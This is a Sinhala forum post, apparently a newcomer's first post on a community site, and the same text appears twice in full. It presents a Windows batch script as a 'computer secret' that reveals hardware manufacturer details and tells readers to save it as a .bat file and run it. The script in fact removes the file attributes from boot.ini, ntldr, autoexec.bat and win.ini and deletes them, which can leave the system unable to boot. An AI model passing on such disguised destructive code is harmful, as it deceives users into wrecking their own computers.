යාළුවනේ මම එලකිරි එකට අලුත්. මෙක මගේ පලවෙනි පොස්ට් එක. එක නිසා මට සපෝට් එකක් දෙන්න.
මම හිතනවා මෙක ඔයාලට වැදගත් වෙයි කියලා...
මේක පොඩි කොම්පියුටර් secret එකක්.
ඔයලගේ hardware manufacture ගෙ ඔක්කොම විස්තර හොයා ගන්න පුලුවන්.
මේ පල්ලෙහ තියන කොඩ් එක notepad එක එකේ copy කරලා paste කරන්න.
ඊට පස්සේ .bat file විදිහට save කරන්න.
ඒ file එක double click කරලා run කරල බලන්න.
කොඩ් එක
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
මම හිතනවා මෙක ඔයාලට වැදගත් වෙයි කියලා...
මේක පොඩි කොම්පියුටර් secret එකක්.
ඔයලගේ hardware manufacture ගෙ ඔක්කොම විස්තර හොයා ගන්න පුලුවන්.
මේ පල්ලෙහ තියන කොඩ් එක notepad එක එකේ copy කරලා paste කරන්න.
ඊට පස්සේ .bat file විදිහට save කරන්න.
ඒ file එක double click කරලා run කරල බලන්න.
කොඩ් එක
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


